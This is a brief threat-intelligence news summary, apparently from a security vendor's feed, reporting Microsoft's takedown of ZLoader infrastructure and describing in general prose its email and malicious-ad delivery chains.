2022-04-19

Microsoft Analyzes & Disrupts Zloader

Level: 
Tactical
  |  Source: 
Microsoft
Cybersecurity
Share:

Microsoft Analyzes & Disrupts Zloader

Microsoft's efforts with telecommunications providers have enabled the takedown of various ZLoader infrastructure. Microsoft has provided intelligence on the various attack chains associated with ZLoader involving different techniques used to deliver the ZLoader payload. The first attack chain involves delivery through email containing a malicious link or attachment downloading the ZLoader payload. A second attack chain leverages Google Ads, popular advertising software tools and compromised legitimate domains to stage malicious content on subdomains. A malicious MSI downloaded and executed by the victim triggers PowerShell and scripts to download the ZLoader payload. With the ZLoader payload dropped from both chains, the modular malware typically creates persistence, downloads additional payloads, or initiates enumeration to fulfill the attacker's objectives.

     

Get trending threats published weekly by the Anvilogic team.

Sign Up Now